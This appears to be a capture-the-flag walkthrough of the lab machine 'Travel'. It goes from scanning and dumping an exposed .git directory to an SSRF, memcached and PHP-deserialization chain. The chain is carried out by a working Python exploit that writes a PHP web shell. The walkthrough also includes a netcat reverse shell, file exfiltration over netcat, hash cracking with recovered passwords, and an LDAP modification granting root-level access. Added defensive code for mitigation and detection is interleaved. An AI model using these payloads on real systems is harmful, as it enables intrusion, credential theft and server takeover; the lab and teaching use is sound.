    Starting Nmap 7.80 ( ) at 2020-07-05 19:52 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 19:52
    Completed NSE at 19:52, 0.00s elapsed
    Initiating NSE at 19:52
    Completed NSE at 19:52, 0.00s elapsed
    Initiating NSE at 19:52
    Completed NSE at 19:52, 0.00s elapsed
    Initiating Ping Scan at 19:52
    Scanning [4 ports]
    Completed Ping Scan at 19:52, 0.65s elapsed (1 total hosts)
    Initiating SYN Stealth Scan at 19:52
    Scanning ( [1000 ports]
    Discovered open port 22/tcp on
    Discovered open port 80/tcp on
    Discovered open port 443/tcp on
    Completed SYN Stealth Scan at 19:52, 3.76s elapsed (1000 total ports)
    Initiating Service scan at 19:52
    Scanning 3 services on (
    Completed Service scan at 19:52, 14.28s elapsed (3 services on 1 host)
    Initiating OS detection (try #1) against (
    Retrying OS detection (try #2) against (
    Retrying OS detection (try #3) against (
    Retrying OS detection (try #4) against (
    Retrying OS detection (try #5) against (
    Initiating Traceroute at 19:52
    Completed Traceroute at 19:52, 0.56s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 19:52
    Completed Parallel DNS resolution of 2 hosts. at 19:52, 0.61s elapsed
    NSE: Script scanning
    Initiating NSE at 19:52
    Completed NSE at 19:53, 14.29s elapsed
    Initiating NSE at 19:53
    Completed NSE at 19:53, 3.08s elapsed
    Initiating NSE at 19:53
    Completed NSE at 19:53, 0.00s elapsed
    Nmap scan report for (
    Host is up (0.30s latency).
    Not shown: 997 closed ports
    22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
    80/tcp  open  http     nginx 1.17.6
    | http-methods: 
    |_  Supported Methods: GET HEAD
    |_http-server-header: nginx/1.17.6
    |_http-title: Travel.HTB
    443/tcp open  ssl/http nginx 1.17.6
    | http-methods: 
    |_  Supported Methods: GET HEAD
    |_http-server-header: nginx/1.17.6
    |_http-title: Travel.HTB - SSL coming soon.
    | ssl-cert: Subject:
    | Subject Alternative Name:,,
    | Issuer:
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2020-04-23T19:24:29
    | Not valid after:  2030-04-21T19:24:29
    | MD5:   ef0a a4c1 fbad 1ac4 d160 58e3 beac 9698
    |_SHA-1: 0170 7c30 db3e 2a93 cda7 7bbe 8a8b 7777 5bcd 0498
    No exact OS matches for host (If you know what OS is running on it, see ).
    TCP/IP fingerprint:

    Uptime guess: 34.417 days (since Mon Jun  1 09:52:43 2020)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=245 (Good luck!)
    IP ID Sequence Generation: All zeros
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE (using port 111/tcp)
    1   555.47 ms
    2   555.59 ms (

    NSE: Script Post-scanning.
    Initiating NSE at 19:53
    Completed NSE at 19:53, 0.00s elapsed
    Initiating NSE at 19:53
    Completed NSE at 19:53, 0.00s elapsed
    Initiating NSE at 19:53
    Completed NSE at 19:53, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at .
    Nmap done: 1 IP address (1 host up) scanned in 55.62 seconds
            Raw packets sent: 1305 (64.070KB) | Rcvd: 1185 (50.866KB)


From the nmap output (the certificate's Subject Alternative Name) we know about 2 other domains:

  • travel.htb

First, add these domains to /etc/hosts.




So I fuzzed every domain, but the interesting hits came from

    └──╼ #wfuzz -u -w /usr/share/wordlists/dirb/common.txt --hc 404

    Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

    * Wfuzz 2.4.5 - The Web Fuzzer                         *

    Total requests: 4614

    ID           Response   Lines    Word     Chars       Payload                                                               

    000000001:   403        7 L      9 W      154 Ch      ""                                                                    
    000000009:   200        1 L      2 W      23 Ch       ".git/HEAD"                                                           
    000000090:   404        7 L      11 W     154 Ch      "_tmp"                                                                ^C
    Finishing pending requests...

The 200 for .git/HEAD means the repository's .git directory is served by the web server, so we can retrieve the source through git's own metadata.
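The server-side fix for this finding, as an added example that is not part of the writeup: nginx should never serve repository metadata. The rule below goes inside the server block that serves the site; returning 404 rather than 403 avoids confirming that the directory exists.

```nginx
# Added example, not from the writeup: refuse every request that touches
# .git (and the equivalent metadata of other VCS tools).
location ~ /\.(git|svn|hg)(/|$) {
    return 404;
}
```

Blocking the path is a mitigation; the root cause is deploying a working checkout with its .git directory into the web root, which is avoided by deploying an export (for example from git archive) instead.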

I used GitDumper for this: LINK

    └──╼ #./ ../../
    # GitDumper is part of
    # Developed and maintained by @gehaxelt from @internetwache
    # Use at your own risk. Usage might be illegal in certain circumstances. 
    # Only for educational purposes!

    [*] Destination folder does not exist
    [+] Creating ../../
    [+] Downloaded: HEAD
    [-] Downloaded: objects/info/packs
    [+] Downloaded: description
    [+] Downloaded: config
    [+] Downloaded: COMMIT_EDITMSG
    [+] Downloaded: index
    [-] Downloaded: packed-refs
    [+] Downloaded: refs/heads/master
    [-] Downloaded: refs/remotes/origin/HEAD
    [-] Downloaded: refs/stash
    [+] Downloaded: logs/HEAD
    [+] Downloaded: logs/refs/heads/master
    [-] Downloaded: logs/refs/remotes/origin/HEAD
    [-] Downloaded: info/refs
    [+] Downloaded: info/exclude
    [-] Downloaded: /refs/wip/index/refs/heads/master
    [-] Downloaded: /refs/wip/wtree/refs/heads/master
    [+] Downloaded: objects/03/13850ae948d71767aff2cc8cc0f87a0feeef63
    [-] Downloaded: objects/00/00000000000000000000000000000000000000
    [+] Downloaded: objects/b0/2b083f68102c4d62c49ed3c99ccbb31632ae9f
    [+] Downloaded: objects/ed/116c7c7c51645f1e8a403bcec44873f74208e9
    [+] Downloaded: objects/2b/1869f5a2d50f0ede787af91b3ff376efb7b039
    [+] Downloaded: objects/30/b6f36ec80e8bc96451e47c49597fdd64cee2da
    └──╼ #cd ../../

With that, every reachable file from the .git directory has been downloaded:

    └──╼ #cat index 
                            template.phpTREE3 0

The index references files that are not present in the working tree, so they need to be restored.

For that we just need a git command:

    └──╼ #git restore .
    └──╼ #ls
    rss_template.php  template.php
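The binary index shown by cat above is what git restore works from: it lists every path that should be in the working tree, with mode and blob id. The reader below is an added example, not the writeup's code or GitDumper's; it parses index format versions 2 and 3 and verifies the trailing checksum, so a dumped repository can be inventoried without running git. The sample index it reads is constructed in memory (the two file names are the ones restored above; stat fields and blob ids are placeholders).

```python
import hashlib
import struct

# Added example (not the writeup's code): a reader for the binary .git/index
# file, format versions 2 and 3. The sample index is constructed in memory.

# Per entry: 10 x 32-bit stat fields, 20-byte blob SHA-1, 16-bit flags (62 bytes).
ENTRY_HEADER = struct.Struct(">10I20sH")


def build_index(paths):
    """Construct a minimal version-2 index listing `paths` (sample data only)."""
    body = b"DIRC" + struct.pack(">II", 2, len(paths))
    for path in sorted(paths):
        name = path.encode()
        # stat fields zeroed, mode 100644 (regular file), blob id is a placeholder
        entry = ENTRY_HEADER.pack(0, 0, 0, 0, 0, 0, 0o100644, 0, 0, len(name),
                                  hashlib.sha1(name).digest(), min(len(name), 0xFFF))
        entry += name + b"\x00"
        entry += b"\x00" * (-len(entry) % 8)      # pad to a multiple of 8 bytes
        body += entry
    return body + hashlib.sha1(body).digest()     # trailing integrity checksum


def parse_index(data):
    """Return the index entries as dicts; raise ValueError if the file is damaged."""
    if data[:4] != b"DIRC":
        raise ValueError("not a git index (missing DIRC signature)")
    version, count = struct.unpack(">II", data[4:12])
    if version not in (2, 3):
        raise ValueError(f"unsupported index version {version}")
    if hashlib.sha1(data[:-20]).digest() != data[-20:]:
        raise ValueError("index checksum mismatch (truncated or tampered)")
    entries, pos = [], 12
    for _ in range(count):
        fields = ENTRY_HEADER.unpack_from(data, pos)
        mode, size, sha, flags = fields[6], fields[9], fields[10], fields[11]
        header_len = ENTRY_HEADER.size
        if version == 3 and flags & 0x4000:       # extended flags word present
            header_len += 2
        name_len = flags & 0xFFF
        start = pos + header_len
        if name_len < 0xFFF:
            name = data[start:start + name_len]
        else:                                     # long name: scan to the NUL
            name = data[start:data.index(b"\x00", start)]
        entries.append({"path": name.decode(), "mode": f"{mode:o}", "size": size,
                        "blob": sha.hex(), "stage": (flags >> 12) & 0x3})
        entry_len = header_len + len(name)
        pos += entry_len + (8 - entry_len % 8)    # 1..8 NUL bytes of padding
    return entries


def tracked_paths(data):
    """Just the paths the index says belong in the working tree."""
    return [e["path"] for e in parse_index(data)]


if __name__ == "__main__":
    sample = build_index(["template.php", "rss_template.php"])
    for e in parse_index(sample):
        print(f'{e["mode"]} {e["blob"]} {e["size"]:>6} {e["path"]}')
```

Pointing parse_index at a real dumped .git/index (open it in binary mode) gives the same listing git ls-files would; a checksum failure tells you the dump is incomplete before you waste time restoring objects.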

Here we have these 2 files, rss_template.php and template.php, to analyse:

What we learned from these files:

Memcached is in use.

There is a GET parameter whose value is handed to curl:

    function url_get_contents ($url) {
        $url = safe($url);              // check on the URL string (rejects localhost)
        $url = escapeshellarg($url);    // quotes the argument, but curl still receives any URL scheme
        $pl = "curl ".$url;
        $output = shell_exec($pl);      // user-controlled URL fetched by curl: the SSRF sink
        return $output;
    }

There is a class that writes its data into a logs directory, and it looks like it is reached through PHP deserialization:

    private function init(string $file, string $data) {
        $this->file = $file;
        $this->data = $data;
        // writes caller-controlled content to a caller-controlled name under logs/
        file_put_contents(__DIR__.'/logs/'.$this->file, $this->data);
    }

This is where the GET parameter is handled:

    $url = $_SERVER['QUERY_STRING'];
    if(strpos($url, "custom_feed_url") !== false){
        $tmp = (explode("=", $url));

So we know there is a URL parameter, custom_feed_url, that could help us get a shell.
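What url_get_contents() above lacks is an allow-list check before the URL reaches curl: the safe() filter only rejects localhost as a string, so other spellings of the loopback address and non-HTTP schemes go through. The validator below is an added example, not the writeup's or the theme's code. It accepts only http(s) on a standard port, and judges the host by every address it resolves to rather than by its spelling. The resolver is injectable; the name table is constructed so the example runs offline, and the public address for feeds.example.com is made up.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Added example (not the writeup's code): an allow-list validator for a
# user-supplied feed URL. The resolver is injectable so the demo runs offline.

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}          # None = scheme default

# Constructed name table: what a resolver would hand back for these names.
CONSTRUCTED_DNS = {
    "feeds.example.com": ["93.184.216.34"],
    "localhost": ["127.0.0.1", "::1"],
    "127.1": ["127.0.0.1"],              # shorthand that inet_aton() expands
    "0x7f000001": ["127.0.0.1"],         # hex form of the same address
    "127.0.0.1": ["127.0.0.1"],
    "::1": ["::1"],
    "169.254.169.254": ["169.254.169.254"],
    "10.0.0.5": ["10.0.0.5"],
}


def table_resolve(host):
    """Offline resolver backed by CONSTRUCTED_DNS."""
    return CONSTRUCTED_DNS.get(host.lower(), [])


def system_resolve(host):
    """Real resolver: every address the name maps to, IPv4 and IPv6."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def validate_feed_url(url, resolve=system_resolve):
    """Return (ok, reason). ok only for http(s) on a standard port whose host
    resolves exclusively to public unicast addresses. Literal and shorthand
    hosts go through the resolver too, so 127.1 and 0x7f000001 are judged
    by the address they become, not by string matching."""
    try:
        parts = urlsplit(url)
        port = parts.port                      # ValueError on a bad port
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme or '<none>'!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL not allowed"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    addrs = resolve(parts.hostname)
    if not addrs:
        return False, f"{parts.hostname} does not resolve"
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        if not ip.is_global or ip.is_multicast:
            return False, f"{parts.hostname} resolves to non-public address {addr}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ["http://feeds.example.com/rss.xml",
                      "gopher://127.0.0.1:11211/_",
                      "http://127.1/", "http://0x7f000001/", "http://[::1]/",
                      "http://feeds.example.com:11211/",
                      "http://169.254.169.254/latest/meta-data/"]:
        print(validate_feed_url(candidate, table_resolve), candidate)
```

Two things the validator cannot do on its own: the address it approved must also be the one the fetch connects to (otherwise a name that re-resolves differently between check and use slips through), and the fetch should be made with an HTTP client that has redirects disabled rather than by shelling out to curl. Memcached itself should also not accept unauthenticated connections from the web tier at all.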

So when we visit this URL:

we get a response in this format:

    └──╼ #python -m SimpleHTTPServer 80
    Serving HTTP on port 80 ...
     - - [05/Jul/2020 22:03:03] "GET / HTTP/1.1" 200 -
     - - [05/Jul/2020 22:03:04] "GET /? HTTP/1.1" 200 -

Now we need to chain memcached, PHP deserialization and the SSRF to get a reverse shell.

To do that there is a tool called Gopherus, which generates gopher:// payloads.


We will generate a payload with Gopherus that lets us execute commands, then trigger it through the URL parameter above. After that we go to the file where our payload was written and execute shell commands.

First we try Gopherus without a payload. Remember to change the loopback address in the generated link, because a plain localhost gives an error, as we saw in the template file above.

    └──╼ #python --exploit phpmemcache

    ________              .__
    /  _____/  ____ ______ |  |__   ___________ __ __  ______
    /   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
    \    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
    \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
            \/       |__|        \/     \/                 \/

            author: $_SpyD3r_$

    This is usable when you know Class and Variable name used by user

    Give serialization payload
    example: O:5:"Hello":0:{}   : O:5:"Hello":0:{}

    Your gopher link is ready to do SSRF : 


    After everything done, you can delete memcached item by using this payload: 



Here we can see that we successfully echoed Hello on the page.

Now we need to generate a payload that stores a PHP command-execution script in a file, which is then saved to the logs directory.

To do that the payload looks like this:

    O:14:"TemplateHelper":2:{s:4:"file";s:'+str(len(file))+':"'+file+'";s:4:"data";s:31:"<?php system($_REQUEST["cmd"]);";}

This payload stores a PHP script in the given file. Here the file is named liquid.php, with a .php extension.

But Gopherus puts its own key name (the "spider" text) in the payload, whereas we need the key xct_4e5612ba079c530a6b1f148c0b352241 there, so we build it with a script like this.

The whole payload looks like this:


    'O:14:"TemplateHelper":2:{s:4:"file";s:'+str(len(file))+':"'+file+'";s:4:"data";s:31:"<?php system($_REQUEST["cmd"]);";}'

Here we prepend the memcached set command for the xct key to this code:

    payload = "%0d%0aset xct_4e5612ba079c530a6b1f148c0b352241 4 0 " + str(len(code)) + "%0d%0a" + code + "%0d%0a"

Here we URL-encode the payload:

    encodedpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")

Here we prepend the gopher:// scheme to the encoded payload:

    return "gopher://" + encodedpayload

The whole script is this:

    import requests
    from urllib.parse import quote_plus

    file = "liquid.php"
    url = ""   # base URL of the target site, with a trailing slash

    def payload():
        # serialized TemplateHelper object: on unserialize it writes `data` into logs/<file>
        code = 'O:14:"TemplateHelper":2:{s:4:"file";s:'+str(len(file))+':"'+file+'";s:4:"data";s:31:"<?php system($_REQUEST["cmd"]);";}'
        #md5(md5(" = 4e5612ba079c530a6b1f148c0b352241
        # memcached "set" for the key the template later reads back and unserializes
        payload = "%0d%0aset xct_4e5612ba079c530a6b1f148c0b352241 4 0 " + str(len(code)) + "%0d%0a" + code + "%0d%0a"
        # URL-encode, but keep %, / and : literal so the gopher selector stays intact
        encodedpayload = quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
        return "gopher://" + encodedpayload

    gopher_payload = payload()
    print("[+] payload is: " + gopher_payload)
    print("[+] Requesting using ssrf in phpmemcache")

    ssrf_url = url + "awesome-rss/?debug=yes&custom_feed_url=" + gopher_payload
    print(ssrf_url)
    r = requests.get(ssrf_url)

    print("[+] Its time for deserialization")
    r = requests.get(url + "awesome-rss/")
    payload_url = url + "wp-content/themes/twentytwenty/logs/" + file
    while True:
        print(payload_url)
        r = requests.get(payload_url)
        if r.status_code == 200:
            break   # the file has been written; stop polling

    print("[+] You are ready to go")
    print("[+] Run commands on web shell now")

After running this script, go to the given URL to execute a command:


So after executing a simple reverse-shell command, nc 9001 -e /bin/bash,

you get a shell like this:

    └──╼ #nc -lnvp 9001
    listening on [any] 9001 ...
    connect to [] from (UNKNOWN) [] 57608
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
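From the defender's side, the whole chain above leaves one clear trace: a request to awesome-rss whose custom_feed_url is not an http(s) feed at all. The scanner below is an added example, not the writeup's code. It walks access-log lines in combined log format, decodes the custom_feed_url parameter once as the application would, decodes the gopher selector a second time as the fetching client would, and flags non-HTTP schemes, memcached commands, serialized PHP objects and the memcached port. The log lines are constructed; the client addresses, the 127.0.0.1:11211 target and the request sizes are assumptions, while the cache key and the O:5:"Hello":0:{} object are the ones shown on this page.

```python
import re
from urllib.parse import parse_qs, unquote

# Added example (not the writeup's code): scanning web-server access logs for
# custom_feed_url values that do not look like feed fetches. The log lines are
# constructed; client IPs and the memcached address are assumptions.

ALLOWED_SCHEMES = {"http", "https"}
MEMCACHED_CMD = re.compile(
    r"(?:^|[\r\n])(?:set|add|replace|append|prepend|cas|get|gets|delete|incr|decr|touch|flush_all)\b")
PHP_OBJECT = re.compile(r'O:\d+:"[^"]+":\d+:\{')     # serialized PHP object header
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

SAMPLE_LOG = [
    '10.0.0.5 - - [05/Jul/2020:22:03:04 +0000] "GET /awesome-rss/?custom_feed_url=http://feeds.example.com/rss.xml HTTP/1.1" 200 4821',
    '10.0.0.9 - - [05/Jul/2020:22:10:11 +0000] "GET /awesome-rss/?debug=yes&custom_feed_url=gopher://127.0.0.1:11211/_%0d%0aset%20xct_4e5612ba079c530a6b1f148c0b352241%204%200%2016%0d%0aO%3A5%3A%22Hello%22%3A0%3A%7B%7D%0d%0a HTTP/1.1" 200 312',
    '10.0.0.9 - - [05/Jul/2020:22:10:12 +0000] "GET /awesome-rss/ HTTP/1.1" 200 7710',
    '10.0.0.7 - - [05/Jul/2020:22:11:40 +0000] "GET /awesome-rss/?custom_feed_url=http://localhost:11211/ HTTP/1.1" 500 0',
]


def analyze_feed_url(value):
    """`value` is the parameter after the one decoding parse_qs applies.
    Returns a list of findings (empty means it looks like an ordinary feed)."""
    findings = []
    m = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", value)
    scheme = m.group(1).lower() if m else ""
    if scheme not in ALLOWED_SCHEMES:
        findings.append(f"scheme {scheme or '<none>'} not http(s)")
    # A gopher selector is percent-decoded by the fetching client before it is
    # written to the socket, so decode once more to see what the service gets.
    wire = unquote(value)
    if MEMCACHED_CMD.search(wire):
        findings.append("memcached command in payload")
    if PHP_OBJECT.search(wire):
        findings.append("serialized PHP object in payload")
    if re.search(r":11211(?:/|$|\r|\n)", wire):
        findings.append("memcached port 11211 targeted")
    return findings


def scan_log(lines):
    """Return one alert per request whose custom_feed_url raises findings."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        query = m.group("target").partition("?")[2]
        for value in parse_qs(query, keep_blank_values=True).get("custom_feed_url", []):
            findings = analyze_feed_url(value)
            if findings:
                alerts.append({"ip": m.group("ip"), "time": m.group("ts"),
                               "status": int(m.group("status")), "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["time"], alert["ip"], "->", "; ".join(alert["findings"]))
```

The second decoding step matters: with only one decode the CRLF-separated memcached command is still percent-encoded and the command regex never fires. Note also that the request that triggers the deserialization (the plain GET to awesome-rss right after) is indistinguishable from normal traffic, so the alert has to come from the injection request itself.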

Here we have a file in the /opt/wordpress/ folder that looks suspicious.

Transfer that file to your own machine:


    nc 9003 < backup-13-04-2020.sql


    └──╼ #nc -lnvp 9003 > backup-13-04-2020.sql
    listening on [any] 9003 ...
    connect to [] from (UNKNOWN) [] 40198

After checking the file I got 2 hashes from its last lines, which I put in hashes.txt and ran against hashcat:

    └──╼ #hashcat -m 400 -a 0 hash ../../THM/Wordlists/rockyou.txt --force
    hashcat (v5.1.0) starting...


    Approaching final keyspace - workload adjusted.  

    Session..........: hashcat
    Status...........: Exhausted
    Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
    Hash.Target......: hash
    Time.Started.....: Sun Jul  5 20:58:28 2020 (1 hour, 0 mins)
    Time.Estimated...: Sun Jul  5 21:58:44 2020 (0 secs)
    Guess.Base.......: File (../../THM/Wordlists/rockyou.txt)
    Guess.Queue......: 1/1 (100.00%)
    Speed.#1.........:     4170 H/s (4.98ms) @ Accel:512 Loops:128 Thr:1 Vec:8
    Recovered........: 1/2 (50.00%) Digests, 1/2 (50.00%) Salts
    Progress.........: 28688768/28688768 (100.00%)
    Rejected.........: 0/28688768 (0.00%)
    Restore.Point....: 14344384/14344384 (100.00%)
    Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:8064-8192
    Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103]

    Started: Sun Jul  5 20:58:24 2020
    Stopped: Sun Jul  5 21:58:44 2020

lynik-admin : 1stepcloser
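The hashcat output above (mode 400, Iteration:8064-8192, a few thousand hashes per second) is explained by the format WordPress stores in wp_users: phpass "portable" hashes, where the fourth character encodes a cost and the password is run through 2^cost chained MD5 calls. The re-implementation below is an added example, not the writeup's code; the algorithm follows the public phpass library, and the known-answer vector used in the test comes from that library's test.php. The only runtime assumption is os.urandom for the salt.

```python
import hashlib
import hmac
import os

# Added example (not the writeup's code): the phpass "portable" hash scheme
# WordPress stores in wp_users, re-implemented to show what hashcat mode 400
# iterates. The algorithm is the one from the public phpass library.

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(raw, count):
    """phpass's own base-64 variant (not RFC 4648)."""
    out, i = [], 0
    while i < count:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def iterations(stored):
    """Number of MD5 rounds encoded in the 4th character of a $P$/$H$ hash."""
    return 1 << ITOA64.index(stored[3])


def crypt_private(password, setting):
    """phpass hash of `password` under `setting` ($P$ + cost char + 8-char salt)."""
    if setting[:3] not in ("$P$", "$H$"):
        return "*"
    count_log2 = ITOA64.find(setting[3])
    if count_log2 < 7 or count_log2 > 30:
        return "*"
    salt = setting[4:12].encode()
    if len(salt) != 8:
        return "*"
    pw = password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(1 << count_log2):          # the cost: 2^count_log2 chained MD5s
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def hash_password(password, count_log2=13):
    """New hash; cost 13 is character 'B', the WordPress default of 8192 rounds."""
    setting = "$P$" + ITOA64[count_log2] + _encode64(os.urandom(6), 6)
    return crypt_private(password, setting)


def check_password(password, stored):
    """Constant-time comparison of the recomputed hash against the stored one."""
    return hmac.compare_digest(crypt_private(password, stored), stored)


if __name__ == "__main__":
    h = hash_password("correct horse battery staple")
    print(h, iterations(h), check_password("correct horse battery staple", h))
```

The $P$B prefix on WordPress hashes is what pins the cost at 8192 rounds, which is why the cracking run above is slow compared with a bare MD5 but still finishes a wordlist per salt in about an hour; modern WordPress and phpass deployments can raise the cost, and a password that is not in a wordlist is what actually protects the account.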


    └──╼ #ssh lynik-admin@
    lynik-admin@'s password: 
    Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64)

    System information as of Sun 05 Jul 2020 05:12:38 PM UTC

    System load:                      0.01
    Usage of /:                       46.5% of 15.68GB
    Memory usage:                     12%
    Swap usage:                       0%
    Processes:                        203
    Users logged in:                  0
    IPv4 address for br-836575a2ebbb:
    IPv4 address for br-8ec6dcae5ba1:
    IPv4 address for docker0:
    IPv4 address for eth0:  

    Last login: Sun Jul  5 15:35:41 2020 from
    lynik-admin@travel:~$ id
    uid=1001(lynik-admin) gid=1001(lynik-admin) groups=1001(lynik-admin)
    lynik-admin@travel:~$ ls
    lynik-admin@travel:~$ cat user.txt 

Here we go with the user flag.

While enumerating I saw files related mainly to LDAP, so I enumerated LDAP further and found these files:

    -rw-r--r-- 1 lynik-admin lynik-admin   82 Apr 23 19:35 .ldaprc
    -rw------- 1 lynik-admin lynik-admin  861 Apr 23 19:35 .viminfo

In these files I found BINDPW: Theroadlesstraveled

So I ran this command to list the users on the LDAP server:

    ldapsearch -x -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled

From this I know that I am an admin of the LDAP directory, so I can add and modify users.

So just create a small LDIF file that modifies the user's attributes and gives it access equivalent to root:


    dn: uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
    changetype: modify
    replace: homeDirectory
    homeDirectory: /root
    -
    add: objectClass
    objectClass: ldapPublicKey
    -
    add: sshPublicKey
    sshPublicKey: ssh-rsa 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 root@liquid
    -
    replace: userPassword
    userPassword: liquid
    -
    replace: gidNumber
    gidNumber: 27

Here we change user johnny's access from low to root by setting:

  • HOME (to give access to everything root has)
  • GID 27 (to add this user to the sudo group)
  • USERPASSWORD (to change the user's password)
  • SSHPUBLICKEY (to add an SSH public key so we can authenticate with our private key)

Generate an SSH key pair on your own machine (without a passphrase, for simplicity) and use the public key in the LDIF above.
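Each of the four changes above is individually legitimate for a directory admin, which is why this path is easy to miss; what should raise an alert is the combination, and any single one of them against a non-admin account. The checker below is an added example, not the writeup's code. It parses LDIF changetype: modify records (tolerating the missing "-" separators of the form shown on this page) and reports privilege-relevant modifications. The sample LDIF is constructed from the change above with a placeholder key; the privileged GID set (0 and 27, sudo on Debian/Ubuntu) and the list of sensitive home prefixes are assumptions of this example.

```python
import base64

# Added example (not the writeup's code): an LDIF "changetype: modify" parser
# plus rules that flag attribute changes that turn an account root-equivalent.
# PRIVILEGED_GIDS and SENSITIVE_HOME_PREFIXES are assumptions of this example.

PRIVILEGED_GIDS = {"0", "27"}                 # root, and sudo on Debian/Ubuntu
SENSITIVE_HOME_PREFIXES = ("/root", "/etc", "/usr", "/var", "/bin", "/sbin")

# Constructed LDIF modelled on the change above; the key is a placeholder.
SAMPLE_LDIF = """\
dn: uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changetype: modify
replace: homeDirectory
homeDirectory: /root
-
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: ssh-rsa AAAA-PLACEHOLDER-KEY root@liquid
-
replace: userPassword
userPassword: liquid
-
replace: gidNumber
gidNumber: 27
"""


def _unfold(text):
    """Join LDIF continuation lines (a leading space) onto the previous line."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif_modify(text):
    """Parse modify records into {'dn', 'changetype', 'mods': [{'op','attr','values'}]}.
    Tolerates a missing '-' between mod-specs."""
    records, rec, cur = [], None, None

    def flush_mod():
        nonlocal cur
        if cur is not None:
            rec["mods"].append(cur)
            cur = None

    def flush_rec():
        nonlocal rec
        if rec is not None:
            flush_mod()
            records.append(rec)
            rec = None

    for line in _unfold(text):
        if line.startswith("#"):
            continue
        if not line.strip():
            flush_rec()
            continue
        if line == "-":
            flush_mod()
            continue
        key, _, value = line.partition(":")
        key = key.strip()
        if value.startswith(":"):                 # "attr:: base64value"
            value = base64.b64decode(value[1:].strip()).decode()
        else:
            value = value.strip()
        if key == "dn":
            flush_rec()
            rec = {"dn": value, "changetype": None, "mods": []}
        elif rec is None:
            raise ValueError(f"attribute before dn: {line!r}")
        elif key == "changetype":
            rec["changetype"] = value
        elif key in ("add", "replace", "delete"):
            flush_mod()
            cur = {"op": key, "attr": value, "values": []}
        elif cur is not None and key.lower() == cur["attr"].lower():
            cur["values"].append(value)
        else:
            raise ValueError(f"unexpected line: {line!r}")
    flush_rec()
    return records


def assess(record):
    """Return human-readable findings for privilege-relevant changes."""
    findings = []
    for mod in record["mods"]:
        attr, op, vals = mod["attr"].lower(), mod["op"], mod["values"]
        if attr == "homedirectory":
            for v in vals:
                if v == "/" or any(v == p or v.startswith(p + "/") for p in SENSITIVE_HOME_PREFIXES):
                    findings.append(f"homeDirectory moved to sensitive path {v}")
        elif attr == "gidnumber" and any(v in PRIVILEGED_GIDS for v in vals):
            findings.append(f"gidNumber set to privileged group {', '.join(vals)}")
        elif attr == "uidnumber" and "0" in vals:
            findings.append("uidNumber set to 0 (root)")
        elif attr == "sshpublickey" and op in ("add", "replace"):
            findings.append("sshPublicKey added or replaced")
        elif attr == "userpassword" and op in ("add", "replace"):
            findings.append("userPassword replaced")
        elif attr == "objectclass" and any(v.lower() == "ldappublickey" for v in vals):
            findings.append("objectClass ldapPublicKey added (enables SSH key login)")
    return findings
```

The same rules apply to the directory's own audit trail (slapd's accesslog overlay records the same attribute and operation per modification), which is where they belong in production, because the LDIF never reaches the server in that form; the admin bind password stored world-readable in .ldaprc is the finding that made the whole step possible.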

Now let's run this command:

    lynik-admin@travel:~$ ldapmodify -x -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled -f liquid.ldif 
    modifying entry "uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb"


